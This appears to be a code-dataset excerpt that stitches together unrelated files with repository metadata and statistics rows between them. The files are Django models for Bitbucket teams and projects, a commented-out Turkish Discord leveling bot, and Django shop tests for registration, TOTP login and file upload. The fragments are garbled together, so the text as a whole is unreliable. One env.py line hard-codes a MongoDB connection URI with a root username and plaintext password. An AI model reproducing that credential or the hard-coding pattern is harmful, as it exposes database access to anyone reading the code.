modified_date = models.DateTimeField(_('Modified date'), auto_now=True)
users = models.ManyToManyField(User, verbose_name=_('Users'),
related_name='bitbucket_organizations')
login = models.CharField(_('Login'), max_length=255, unique=True)
email = models.EmailField(_('Email'), max_length=255, null=True, blank=True)
name = models.CharField(_('Name'), max_length=255, null=True, blank=True)
html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
active = models.BooleanField(_('Active'), default=False)
json = models.TextField('JSON')
def __unicode__(self):
return "Bitbucket Team: %s" % (self.html_url)
class BitbucketProject(models.Model):
# Auto fields
pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
modified_date = models.DateTimeField(_('Modified date'), auto_now=True)
users = models.ManyToManyField(User, verbose_name=_('Users'),
related_name='bitbucket_projects')
organization = models.ForeignKey(BitbucketTeam, verbose_name=_('Organization'),
related_name='projects', null=True, blank=True)
name = models.CharField(_('Name'), max_length=255)
full_name = models.CharField(_('Full Name'), max_length=255, unique=True)
description = models.TextField(_('Description'), blank=True, null=True,
help_text=_('The reStructuredText description of the project'))
vcs = models.CharField(_('vcs'), max_length=200, blank=True)
git_url = models.CharField(_('Git URL'), max_length=200, blank=True)
ssh_url = models.CharField(_('SSH URL'), max_length=200, blank=True)
html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
active = models.BooleanField(_('Active'), default=False)
json = models.TextField('JSON')
def __unicode__(self):
return "Bitbucket Project: %s" % (self.html_url)
| 46.978495
| 98
| 0.673838
| 507
| 4,369
| 5.550296
| 0.151874
| 0.060768
| 0.042644
| 0.060412
| 0.889126
| 0.8543
| 0.8543
| 0.8543
| 0.8543
| 0.8543
| 0
| 0.016166
| 0.19295
| 4,369
| 92
| 99
| 47.48913
| 0.781906
| 0.010758
| 0
| 0.727273
| 0
| 0
| 0.140144
| 0.005328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.045455
| 0.060606
| 0.878788
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0d44e5e6d9f36901e93c880a5e517173d618c59a
| 159
|
py
|
Python
|
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
env.py
|
Code-Institute-Submissions/Lordph8-Project3
|
fdefe7ffb7c53e8cb2d70b8c760e4efd27bb4517
|
[
"MIT"
] | null | null | null |
import os
os.environ.setdefault("MONGO_URI", "mongodb+srv://root:Thisisarandompassword@myfirstcluster-qpzww.mongodb.net/theRecipe?retryWrites=true&w=majority")
| 79.5
| 149
| 0.836478
| 20
| 159
| 6.6
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018868
| 159
| 2
| 149
| 79.5
| 0.846154
| 0
| 0
| 0
| 0
| 0.5
| 0.75
| 0.69375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 8
|
0d51a39dc3763222336d58785130ec15857fbfe1
| 34,938
|
py
|
Python
|
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | 5
|
2021-11-20T12:30:55.000Z
|
2022-02-02T15:34:23.000Z
|
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | null | null | null |
cogs/information.py
|
BioKZM/Colonist
|
ab3872c01b1bdc235e80065530fbed9953952919
|
[
"MIT"
] | null | null | null |
# import discord
# import asyncio
# import json
# from discord.ext import commands
# from discord.utils import get
# # from cogs.personalPoint import PersonalPoint
# from main import client
# from discord_ui import UI,Button
# from functions.userClass import User,experiences,levelNames
# from cogs.rank import getSortedMembers
# ui = UI(client)
# class Information(commands.Cog):
# def __init__(self,client):
# self.client = client
# @commands.command()
# async def bilgi(self,ctx):
# embed = discord.Embed(title="Üye Bilgi Ekranı",description="Üye bilgi ekranına hoş geldin.\nAşağıdaki butonlara basarak\nbilgisini almak istediğin içeriği görebilirsin.",color = 0x8d42f5,)
# embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
# message = await ctx.channel.send(
# embed=embed,
# components = [
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# ),
# ]
# )
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# info[ctx.author.id] = message.id
# with open("files/infoMessage.json","w") as file:
# json.dump(info,file,indent=4)
# @ui.components.listening_component('seviye')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# member = component.author
# user = User(member.id)
# if not member.bot:
# embed = discord.Embed(title=f"{member.name}#{member.discriminator} adlı kullanıcının değerleri",description="",color=0x8d42f5)
# embed.add_field(name="Mevcut değerler - 🏆 ",value="Seviyesi = **{}**\n Puanı = **{}**\n Rütbesi = **{}**\n".format(user.level,user.XP,user.levelName,inline=False))
# if user.isMaxLevel():
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**Maksimum seviyeye ulaştınız!**",inline=False)
# elif not user.isMaxLevel():
# if experiences[user.level] - user.XP <= 0:
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**{levelNames[user.getLevel(user.XP)]}** rütbesine ulaştın! Seviye atlamak için ses kanalına girebilirsin.",inline=False)
# else:
# embed.add_field(name="Bir sonraki rütbe - 🚀 ",value=f"**{levelNames[user.level]}** rütbesi için kalan puan = **{(experiences[user.level-2])-user.XP}**",inline=False)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# return
# try:
# await component.respond()
# except:
# pass
# @ui.components.listening_component('liderliktablosu')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# sortedMembers = getSortedMembers(component)
# embed=discord.Embed(title="Sıralama",inline=False,color=0x8d42f5)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# count = 1
# for key,value in sortedMembers.items():
# embed.add_field(name="{} - {}".format(count,key),value="**Puan**: {}\n**Rütbe**: {}".format(value[0],value[1]),inline=False)
# count += 1
# if count == 11:break
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('detaylıbilgi')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# liste = {}
# XP = {}
# for i in range(1,11):
# liste[f'level{i}'] = 0
# XP[f'xp{i}'] = ""
# if i == 1:
# XP[f"xp{i}"] += f"{levelNames[i-1]}"
# else:
# XP[f'xp{i}'] += f"{levelNames[i-1]} - {experiences[i-2]}"
# try:
# await component.respond()
# except:
# pass
# for member in client.get_all_members():
# if not member.bot:
# user = User(member.id)
# liste[f'level{user.level}'] += 1
# message = discord.Embed(title = "Detaylı Bilgi",description="**Aşağıda, hangi seviyede kaç kullanıcının bulunduğunu öğrenebilirsin**",color = 0x8d42f5)
# for level in range(1,11):
# XPs = XP[f'xp{level}']
# levels = liste[f'level{level}']
# if levels == 0:
# if XP[f'xp{level}'] == "Guest":
# message.add_field(name=f"*Seviye {level}* / {XPs}:",value=f"Bu seviyede herhangi biri yok.",inline=False)
# else:
# message.add_field(name=f"*Seviye {level}* / {XPs} XP:",value=f"Bu seviyede herhangi biri yok.",inline=False)
# else:
# if XP[f'xp{level}'] == "Guest":
# message.add_field(name=f"*Seviye {level}* / {XPs}:",value=f"**{levels}** kişi bu seviyede.",inline=False)
# else:
# message.add_field(name=f"*Seviye {level}* / {XPs} XP:",value=f"**{levels}** kişi bu seviyede.",inline=False)
# message.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=message,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('görevler')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# embed = discord.Embed(
# title = "Görevler",
# description = "**Bir gemiye atla ve bir oyun üret**;\nPC/Platform .............................. 10.0000 XP\nMobil ............................................... 5.000 XP\nHyperCasual................................... 2.000 XP\nGameJam.......................................... 1.000XP\n*Oyun yayınlanırsa kazanılan deneyim puanı iki katına çıkar*",
# color = 0x8d42f5
# )
# embed.add_field(
# name = "\n\nSunucu Takviyesi",
# value = "Her sunucu takviyesi başına **250 XP**",
# inline=False
# )
# embed.add_field(
# name = "\n\nSes Kanallarına Aktif Ol",
# value = "Dakika başına 1 XP\n*Not: Kazanılan XP, yayın ve kamera açma durumuna göre değişiklik gösterir.*",
# inline=False
# )
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components=[
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('seviyeler')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# await component.message.edit(components=[
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# disabled=True
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# disabled=True
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# disabled=True
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# disabled=True
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# disabled=True
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# disabled=True
# ),
# ])
# try:
# await component.respond()
# except:
# pass
# embed = discord.Embed(
# title = "Seviyeler",
# description = "Aşağıda, sunucuda bulunan mevcut seviyeleri görebilirsin.",
# color = 0x8d42f5
# )
# embed.add_field(
# name = "Guest:",
# value = "Misafir statüsünde üye",
# inline = False,
# )
# embed.add_field(
# name = "Colony Member / 250 XP:",
# value = "Koloni üyesi",
# inline = False,
# )
# embed.add_field(
# name = "Open Crew / 1.987 XP:",
# value = "Açık gemilerde mürettebat olma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Crew / 6.666 XP:",
# value = "Bütün gemilerde mürettebat olma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Captain / 9.999 XP:",
# value = "Gemilere kaptanlık yapma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Judge / 30.000 XP:",
# value = "Oy kullanma hakkına sahip üye",
# inline = False,
# )
# embed.add_field(
# name = "Colony Manager / 90.000 XP:",
# value = "Tasarlanacak oyunlara karar veren üye",
# inline = False,
# )
# embed.add_field(
# name = "Mars Lover / 300.000 XP:",
# value = "Yayınlanan bütün oyunlarda adına teşekkür edilen üye",
# inline = False,
# )
# embed.add_field(
# name = "Chief of the Colony / 900.000 XP:",
# value = "Kolonideki kamu yönetiminde, herhangi bir rolü alabilen üye, A.K.A Chief",
# inline = False,
# )
# embed.add_field(
# name = "Partner / 10.000.001 XP:",
# value = "Koloninin fahri ortağı",
# inline = False,
# )
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# await component.message.edit(embed=embed,components = [
# Button(
# label="Geri",
# custom_id="geri",
# color=ButtonStyle.Grey,
# emoji="⬅️"
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# )
# ])
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('geri')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# else:
# embed = discord.Embed(title="Üye Bilgi Ekranı",description="Üye bilgi ekranına hoş geldin.\nAşağıdaki butonlara basarak\nbilgisini almak istediğin içeriği görebilirsin.",color = 0x8d42f5)
# embed.set_author(name=component.author.display_name, icon_url=component.author.avatar_url)
# try:
# await component.respond()
# except:
# pass
# await component.message.edit(
# embed=embed,
# components = [
# Button(
# label = "Mevcut Seviye",
# custom_id = "seviye",
# color = ButtonStyle.Green,
# emoji = "📰",
# ),
# Button(
# label = "Liderlik Tablosu",
# custom_id = "liderliktablosu",
# color = ButtonStyle.Green,
# emoji = "📋",
# ),
# Button(
# label = "Detaylı Bilgi",
# custom_id = "detaylıbilgi",
# color = ButtonStyle.Green,
# emoji = "📜",
# new_line=True,
# ),
# Button(
# label="Görevler",
# custom_id = "görevler",
# color = ButtonStyle.Green,
# emoji = "🪧",
# ),
# Button(
# label="Seviyeler",
# custom_id = "seviyeler",
# color = ButtonStyle.Green,
# emoji = "🚩",
# new_line=True,
# ),
# Button(
# label = "Mesajı Sil",
# custom_id = "sil",
# color = ButtonStyle.Red,
# ),
# ]
# )
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# @ui.components.listening_component('sil')
# async def listening_component(component):
# with open("files/infoMessage.json") as file:
# info = json.load(file)
# try:
# if component.message.id != info[f"{component.author.id}"]:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# await component.message.delete()
# else:
# try:
# await component.respond()
# except:
# pass
# await component.message.delete()
# del info[component.author.id]
# with open("files/infoMessage.py","w",encoding="utf-8") as dosya:
# dosya.write("info = ")
# dosya.write(str(info))
# except KeyError:
# embed = discord.Embed(
# title = "Uyarı",
# description = "Bu senin mesajın değil!\nKendini mesajını oluşturmak için `!bilgi`",
# color = 0xFF0000
# )
# try:
# await component.respond()
# except:
# pass
# message = await component.channel.send(embed=embed)
# await asyncio.sleep(5)
# await message.delete()
# def setup(client):
# client.add_cog(Information(client))
| 41.642431
| 373
| 0.382563
| 2,462
| 34,938
| 5.393176
| 0.123883
| 0.043079
| 0.055355
| 0.068534
| 0.807802
| 0.801627
| 0.783401
| 0.778732
| 0.76879
| 0.753728
| 0
| 0.012207
| 0.509961
| 34,938
| 839
| 374
| 41.642431
| 0.76047
| 0.944187
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b4f6a6979f60206415ac42ae13093ab17a970251
| 27,291
|
py
|
Python
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 3
|
2017-01-18T14:21:41.000Z
|
2021-10-29T23:47:31.000Z
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 1
|
2017-05-16T20:24:01.000Z
|
2017-05-17T21:28:27.000Z
|
shop/tests.py
|
okcashpro/okshop
|
f18600537eca12a0fe7dd52ed5453ed65c2ecacc
|
[
"MIT"
] | 1
|
2021-10-29T23:47:24.000Z
|
2021-10-29T23:47:24.000Z
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import *
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files.uploadedfile import InMemoryUploadedFile
from io import BytesIO
import pyotp
import json
# Create your tests here.
class RegisterTestCase(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('u1', 'email@example.com', '')
ue1 = UserExtra(user=self.u1)
ue1.save()
self.u1.save()
def test_user_register_all_valid(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u3',
'email': 'test@example.com',
'password': 'pass1234',
'passwordconfirm': 'pass1234'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertEquals(m.tags, 'success')
def test_user_register_invalid_email(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u4',
'email': 'test1@example',
'password': 'pass1234',
'passwordconfirm':
'pass1234'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_user_register_password_too_short(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u5',
'email': 'test2@example.com',
'password': 'pass123',
'passwordconfirm': 'pass123'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_user_register_password_mismatch(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u6',
'email': 'test3@example.com',
'password': 'pass1234',
'passwordconfirm': 'pass4'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_user_register_username_in_use(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u1',
'email': 'test4@example.com',
'password': 'pass1234',
'passwordconfirm':
'pass1234'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_user_email_in_use(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u7',
'email': 'email@example.com',
'password': 'pass1234',
'passwordconfirm': 'pass1234'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_user_invalid_username(self):
response = self.client.post(reverse('shop:register'), {
'username': 'u3',
'email': 'test5@example',
'password': 'pass1234',
'passwordconfirm': 'pass1234'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
class LoginTestCase(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('_u1', 'email@example.com',
'p4ssw0rd')
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
self.u1.save()
self.u2 = User.objects.create_user('_u2', 'email2@example.com',
'p4ssw0rd')
ue2 = UserExtra(user=self.u2, verified=False)
ue2.save()
self.u2.save()
self.u3 = User.objects.create_user('_u3', 'email3@example.com',
'p4ssw0rd')
ue3 = UserExtra(user=self.u3, verified=True, authenticator_id='test',
authenticator_verified=True)
ue3.save()
self.u1.save()
def test_login_all_valid_no_2fa(self):
response = self.client.post(reverse('shop:login'), {
'username': '_u1',
'password': 'p4ssw0rd'
}, follow=True)
self.assertEquals(response.status_code, 200)
self.assertEquals(str(list(response.context['messages'])[0]),
'Welcome back, _u1!')
def test_login_all_invalid_no_2fa(self):
response = self.client.post(reverse('shop:login'), {
'username': 'invalidname',
'password': 'paaaaaaaaaaaa'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_login_invalid_pass_no_2fa(self):
response = self.client.post(reverse('shop:login'), {
'username': '_u1',
'password': 'paaaaaaaaaaaa'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_login_not_verified(self):
response = self.client.post(reverse('shop:login'), {
'username': '_u2',
'password': 'p4ssw0rd'
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
def test_login_all_valid_2fa(self):
totp = pyotp.TOTP('test')
response = self.client.post(reverse('shop:login'), {
'username': '_u3',
'password': 'p4ssw0rd',
'2facode': totp.now()
}, follow=True)
self.assertEquals(str(list(response.context['messages'])[0]),
'Welcome back, _u3!')
def test_login_invalid_2fa(self):
response = self.client.post(reverse('shop:login'), {
'username': '_u3',
'password': 'p4ssw0rd',
'2facode': ''
}, follow=True)
self.assertEquals(response.status_code, 200)
for m in list(response.context['messages']):
self.assertNotEqual(m.tags, 'success')
class TestUploadFiles(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('__u1', '', 'passw0rd')
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
self.u1.save()
self.p1 = Product(
product_name='T',
product_description='d',
price=0,
physical=False,
seller=self.u1
)
self.p1.save()
self.u2 = User.objects.create_user('__u2', '', 'passw0rd')
ue2 = UserExtra(user=self.u2, verified=True)
ue2.save()
self.u2.save()
def test_upload_product_not_found(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': '291827346271725623'}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': 'n'
}
)
self.assertEqual(r.status_code, 404)
